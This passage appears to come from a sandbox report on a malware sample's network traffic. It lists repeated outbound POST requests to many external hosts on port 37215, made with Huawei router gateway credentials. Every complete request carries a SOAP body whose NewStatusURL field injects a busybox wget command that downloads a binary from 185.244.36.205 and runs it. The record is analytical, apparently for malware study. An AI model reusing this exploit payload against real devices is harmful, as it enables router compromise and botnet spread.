                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2130192.168.2.1543190121.156.100.19337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.119692087 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2131192.168.2.1552714157.68.41.23437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.119739056 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2132192.168.2.1556478186.178.191.15137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.119759083 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2133192.168.2.1551546121.22.81.24537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.119791031 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2134192.168.2.1559228102.158.173.16137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.119805098 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2135192.168.2.155585841.253.234.13137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.119883060 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2136192.168.2.1544224138.20.134.8437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.119889975 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2137192.168.2.154444631.20.4.24037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.119913101 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2138192.168.2.1534716121.68.87.21137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.119916916 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2139192.168.2.1558738197.14.208.23337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.120536089 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
